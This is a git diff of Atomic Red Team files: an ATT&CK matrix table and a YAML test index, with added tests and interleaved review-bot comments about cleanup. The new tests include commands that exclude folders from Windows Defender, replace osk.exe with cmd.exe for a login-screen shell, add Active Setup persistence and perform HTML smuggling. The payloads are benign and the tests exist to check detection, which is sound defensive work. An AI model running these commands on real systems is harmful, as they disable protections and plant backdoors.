| [Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md) | [Native API](../../T1106/T1106.md) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Forge Web Credentials: SAML token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Service Discovery](../../T1007/T1007.md) | [Remote Services: Windows Remote Management](../../T1021.006/T1021.006.md) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Double File Extension [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials in Registry [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Remote Services: Distributed Component Object Model](../../T1021.003/T1021.003.md) | [Email Collection: Local Email Collection](../../T1114.001/T1114.001.md) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Bypass User Access Control](../../T1548.002/T1548.002.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Share Discovery](../../T1135/T1135.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Automated Collection](../../T1119/T1119.md) | Data Compressed [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Autostart Execution](../../T1547/T1547.md) | [Active Setup](../../T1547.014/T1547.014.md) | Timestomp [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | [Peripheral Device Discovery](../../T1120/T1120.md) | [Use Alternate Authentication Material: Pass the Ticket](../../T1550.003/T1550.003.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Protocol Tunneling](../../T1572/T1572.md) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Credentials in Registry](../../T1552.002/T1552.002.md) | [System Information Discovery](../../T1082/T1082.md) | Shared Webroot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Transfer Size Limits [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Active Setup [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Active Setup](../../T1547.014/T1547.014.md) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md) | [Application Window Discovery](../../T1010/T1010.md) | [Software Deployment Tools](../../T1072/T1072.md) | Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Encrypted [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Steal or Forge Kerberos Tickets: AS-REP Roasting](../../T1558.004/T1558.004.md) | Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Defacement: Internal Defacement](../../T1491.001/T1491.001.md) |
|
||||
| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md) | [Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Code Signing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
|
||||
| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Office Application Startup](../../T1137/T1137.md) | AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mavinject [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Credentials from Password Stores](../../T1555/T1555.md) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Pass the Ticket [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
|
||||
@@ -136,7 +136,7 @@
|
||||
| | | | | Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [HTML Smuggling](../../T1027.006/T1027.006.md) | | | | | | | |
|
||||
| | | | | Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
|
||||
| | | | | [Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md) | | | | | | | |
|
||||
|
||||
+660
-35
@@ -2171,7 +2171,6 @@ defense-evasion:
|
||||
|
||||
'
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Bypass UAC by Mocking Trusted Directories
|
||||
auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
|
||||
description: |
|
||||
@@ -10125,13 +10124,12 @@ defense-evasion:
|
||||
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Modify Registry of Local Machine - cmd
|
||||
auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe
|
||||
description: |
|
||||
Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when
|
||||
CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully."
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\Software\Microsoft\Windows\CurrentVersion\Run.
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
@@ -10701,7 +10699,6 @@ defense-evasion:
|
||||
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1
|
||||
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Windows Powershell Logging Disabled
|
||||
auto_generated_guid: 95b25212-91a7-42ff-9613-124aca6845a8
|
||||
description: |
|
||||
@@ -10851,7 +10848,6 @@ defense-evasion:
|
||||
reg delete HKCU\SOFTWARE\NetWire /va /f >nul 2>&1
|
||||
reg delete HKCU\SOFTWARE\NetWire /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Ursnif Malware Registry Key Creation
|
||||
auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0
|
||||
description: |
|
||||
@@ -10868,7 +10864,6 @@ defense-evasion:
|
||||
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /va /f >nul 2>&1
|
||||
reg delete HKCU\Software\AppDataLow\Software\Microsoft\3A861D62-51E0-15700F2219A4 /f >nul 2>&1
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Terminal Server Client Connection History Cleared
|
||||
auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21
|
||||
description: 'The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe)
|
||||
@@ -18189,6 +18184,24 @@ defense-evasion:
|
||||
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Defender-ApplicationGuard" -NoRestart -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: WMIC Tamper with Windows Defender Evade Scanning Folder
|
||||
auto_generated_guid: 59d386fc-3a4b-41b8-850d-9e3eee24dfe4
|
||||
description: |
|
||||
The following Atomic will attempt to exclude a folder within Defender leveraging WMI
|
||||
Reference: https://www.bleepingcomputer.com/news/security/gootkit-malware-bypasses-windows-defender-by-setting-path-exclusions/
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: 'wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class MSFT_MpPreference
|
||||
call Add ExclusionPath=\"ATOMICREDTEAM\"
|
||||
|
||||
'
|
||||
cleanup_command: 'wmic.exe /Namespace:\\root\Microsoft\Windows\Defender class
|
||||
MSFT_MpPreference call Remove ExclusionPath=\"ATOMICREDTEAM\"
|
||||
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1601:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -22999,7 +23012,34 @@ defense-evasion:
|
||||
- Static File Analysis
|
||||
x_mitre_attack_spec_version: 2.1.0
|
||||
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||||
atomic_tests: []
|
||||
identifier: T1027.006
|
||||
atomic_tests:
|
||||
- name: HTML Smuggling Remote Payload
|
||||
auto_generated_guid: 30cbeda4-08d9-42f1-8685-197fad677734
|
||||
description: "The HTML file will download an ISO file from [T1553.005](https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1553.005/bin/FeelTheBurn.iso)
|
||||
without userinteraction. \nThe HTML file is based off of the work from [Stan
|
||||
Hegt](https://outflank.nl/blog/2018/08/14/html-smuggling-explained/)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
dependencies:
|
||||
- description: 'T1027_006_remote.html must exist on disk at specified at PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html
|
||||
|
||||
'
|
||||
prereq_command: 'if (Test-Path PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html)
|
||||
{ exit 0} else { exit 1}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
New-Item -Type Directory "PathToAtomicsFolder\T1027.006\bin\" -ErrorAction ignore | Out-Null
|
||||
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.006/bin/T1027_006_Remote.html" -OutFile "PathToAtomicsFolder\T1027.006\bin\T1027_006_Remote.html"
|
||||
executor:
|
||||
command: 'PathToAtomicsFolder\T1027.006\bin\T1027_006_remote.html
|
||||
|
||||
'
|
||||
cleanup_command: "$user = [System.Environment]::UserName; Remove-Item -Path
|
||||
C:\\Users\\$user\\Downloads\\FeelTheBurn.iso"
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
T1556.005:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -28594,7 +28634,6 @@ privilege-escalation:
|
||||
|
||||
'
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: Bypass UAC by Mocking Trusted Directories
|
||||
auto_generated_guid: f7a35090-6f7f-4f64-bb47-d657bf5b10c1
|
||||
description: |
|
||||
@@ -29676,7 +29715,76 @@ privilege-escalation:
|
||||
- 'Command: Command Execution'
|
||||
x_mitre_permissions_required:
|
||||
- Administrator
|
||||
atomic_tests: []
|
||||
identifier: T1547.014
|
||||
atomic_tests:
|
||||
- name: HKLM - Add atomic_test key to launch executable as part of user setup
|
||||
auto_generated_guid: deff4586-0517-49c2-981d-bbea24d48d71
|
||||
description: "This test will create an \"atomic_test\" key under 'HKLM:\\SOFTWARE\\Microsoft\\Active
|
||||
Setup\\Installed Components' to launch calc by configuring an active setup
|
||||
executable and \nforcing to run active setup using the \"runonce.exe /AlternateShellStartup\"
|
||||
command. \nWithout the \"runonce.exe /AlternateShellStartup\" command it would
|
||||
run during the next logon for each user.\n\nNote: If you logout before running
|
||||
the cleanup command, you will be required to go through the OOBE (out-of-box
|
||||
experience) setup sequence to log back in. \nThe payload will only run once
|
||||
unless the cleanup command is run in between tests.\n\n[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: "New-Item \"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\"
|
||||
-Name \"atomic_test\" -Force\nSet-ItemProperty \"HKLM:\\SOFTWARE\\Microsoft\\Active
|
||||
Setup\\Installed Components\\atomic_test\" \"(Default)\" \"ART TEST\" -Force\nSet-ItemProperty
|
||||
\"HKLM:\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\atomic_test\"
|
||||
\"StubPath\" \"#{payload}\" -Force \n& $env:SYSTEMROOT\\system32\\runonce.exe
|
||||
/AlternateShellStartup"
|
||||
cleanup_command: |-
|
||||
Remove-Item "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
Remove-Item "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\atomic_test" -Force -ErrorAction Ignore
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - Add malicious StubPath value to existing Active Setup Entry
|
||||
auto_generated_guid: 39e417dd-4fed-4d9c-ae3a-ba433b4d0e9a
|
||||
description: "This test will add a StubPath entry to the Active Setup native
|
||||
registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600})
|
||||
\nSaid key doesn't have a StubPath value by default, by adding one it will
|
||||
launch calc by forcing to run active setup using runonce.exe /AlternateShellStartup.
|
||||
\nWithout the last command it will normally run on next user logon. Note:
|
||||
this test will only run once successfully if no cleanup command is run in
|
||||
between test.\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
input_arguments:
|
||||
payload:
|
||||
description: Payload to run once during login
|
||||
type: String
|
||||
default: C:\Windows\System32\calc.exe
|
||||
executor:
|
||||
command: |-
|
||||
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" "StubPath" "#{payload}" -Force
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
cleanup_command: |-
|
||||
Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "StubPath" -Force
|
||||
Remove-ItemProperty "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing
|
||||
version number
|
||||
auto_generated_guid: 04d55cef-f283-40ba-ae2a-316bc3b5e78c
|
||||
description: "This test will decrease the version number of the 'Internet Explorer
|
||||
Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for
|
||||
the current user, \nwhich will force the StubPath payload (if set) to execute.\n"
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
Set-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Active Setup\Installed Components\{C9E9A340-D1F1-11D0-821E-444553540600}" -Name "Version" -Value "0,0,0,0"
|
||||
& $env:SYSTEMROOT\system32\runonce.exe /AlternateShellStartup
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
T1484.002:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
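Review bot: The third T1547.014 test (`re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number`) has no cleanup_command, so the HKCU `Version` value it overwrites with `0,0,0,0` for `{C9E9A340-D1F1-11D0-821E-444553540600}` is never restored; the second test's cleanup deletes that same HKCU value, but that only helps when both tests run in order. Whether Active Setup rewrites the value after `runonce.exe /AlternateShellStartup` is not established by the description, so the safe course is to make the test self-contained: read the current value in `command` (e.g. `Get-ItemPropertyValue` into a file under `$env:TEMP`) and put it back with `Set-ItemProperty` in a new `cleanup_command`. Separately, the second test's two `Remove-ItemProperty` cleanup lines lack `-ErrorAction Ignore` while the first test's cleanup has it, so cleanup throws if the value was never created. The same block is duplicated under `persistence:` at `@@ -50486`.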
@@ -34345,7 +34453,7 @@ privilege-escalation:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe
|
||||
IF NOT EXIST C:\Windows\System32\sethc_backup.exe (copy C:\Windows\System32\sethc.exe C:\Windows\System32\sethc_backup.exe) ELSE ( pushd )
|
||||
takeown /F C:\Windows\System32\sethc.exe /A
|
||||
icacls C:\Windows\System32\sethc.exe /grant Administrators:F /t
|
||||
copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
|
||||
@@ -34354,6 +34462,33 @@ privilege-escalation:
|
||||
'
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
- name: Create Symbolic Link From osk.exe to cmd.exe
|
||||
auto_generated_guid: 51ef369c-5e87-4f33-88cd-6d61be63edf2
|
||||
description: 'Replace accessiblity executable with cmd.exe to provide elevated
|
||||
command prompt from login screen without logging in.
|
||||
|
||||
'
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
command: |
|
||||
IF NOT EXIST %windir%\System32\osk.exe.bak (copy %windir%\System32\osk.exe %windir%\System32\osk.exe.bak) ELSE ( pushd )
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
mklink %windir%\System32\osk.exe %windir%\System32\cmd.exe
|
||||
cleanup_command: |
|
||||
takeown /F %windir%\System32\osk.exe /A
|
||||
icacls %windir%\System32\osk.exe /grant Administrators:F /t
|
||||
del %windir%\System32\osk.exe
|
||||
copy /Y %windir%\System32\osk.exe.bak %windir%\System32\osk.exe
|
||||
icacls %windir%\system32\osk.exe /inheritance:d
|
||||
icacls %windir%\system32\osk.exe /setowner "NT SERVICE\TrustedInstaller"
|
||||
icacls %windir%\System32\osk.exe /grant "NT SERVICE\TrustedInstaller":F /t
|
||||
icacls %windir%\system32\osk.exe /grant:r SYSTEM:RX
|
||||
icacls %windir%\system32\osk.exe /grant:r Administrators:RX
|
||||
name: command_prompt
|
||||
elevation_required: true
|
||||
T1504:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
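Review bot: The cleanup_command of `Create Symbolic Link From osk.exe to cmd.exe` restores the original binary and TrustedInstaller ownership but never removes `%windir%\System32\osk.exe.bak`, so a spare copy of the accessibility binary is left in System32 after every run; adding `del %windir%\System32\osk.exe.bak` after the `copy /Y` line closes that. The `IF NOT EXIST ... ELSE ( pushd )` guard relies on a bare `pushd` as a no-op, which reads as a typo; `rem` is the conventional cmd no-op and says what is meant. The same lines appear in the `persistence:` copy of this hunk at `@@ -56141`.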
@@ -34952,6 +35087,34 @@ privilege-escalation:
|
||||
mv -Force #{settings_json_tmp} #{settings_json_def}
|
||||
taskkill /F /IM "#{calculator}" > $null
|
||||
name: powershell
|
||||
- name: Add macOS LoginItem using Applescript
|
||||
auto_generated_guid: 716e756a-607b-41f3-8204-b214baf37c1d
|
||||
description: |
|
||||
Runs osascript on a file to create new LoginItem for current user.
|
||||
NOTE: Will popup dialog prompting user to Allow or Deny Terminal.app to control "System Events"
|
||||
Therefore, it can't be automated until the TCC is granted.
|
||||
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
|
||||
In addition to the `osascript` Process Events, file modification events to
|
||||
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
|
||||
supported_platforms:
|
||||
- macos
|
||||
input_arguments:
|
||||
scriptfile:
|
||||
description: path to Applescript source to add Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/add_login_item.osa
|
||||
cleanup_script:
|
||||
description: path to Applescript source to delete Safari LoginItem.
|
||||
type: String
|
||||
default: PathToAtomicsFolder/T1547.015/src/remove_login_item.osa
|
||||
executor:
|
||||
command: 'osascript #{scriptfile}
|
||||
|
||||
'
|
||||
cleanup_command: 'osascript #{cleanup_script}
|
||||
|
||||
'
|
||||
name: bash
|
||||
T1134.001:
|
||||
technique:
|
||||
x_mitre_platforms:
|
||||
@@ -36591,7 +36754,6 @@ privilege-escalation:
|
||||
Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" -Name "Startup" -Value "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
|
||||
Remove-Item "#{new_startup_folder}" -Recurse -Force
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKCU - Policy Settings Explorer Run Key
|
||||
auto_generated_guid: a70faea1-e206-4f6f-8d9a-67379be8f6f1
|
||||
description: "This test will create a new value under HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run
|
||||
@@ -37663,7 +37825,8 @@ privilege-escalation:
|
||||
- description: 'AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
|
||||
|
||||
'
|
||||
prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1}
|
||||
prereq_command: 'if (Test-Path PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll)
|
||||
{ exit 0} else { exit 1}
|
||||
|
||||
'
|
||||
get_prereq_command: |
|
||||
@@ -37678,6 +37841,47 @@ privilege-escalation:
|
||||
-Name AutodialDLL -Value $env:windir\system32\rasadhlp.dll
|
||||
name: powershell
|
||||
elevation_required: true
|
||||
- name: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation)
|
||||
auto_generated_guid: a574dafe-a903-4cce-9701-14040f4f3532
|
||||
description: |-
|
||||
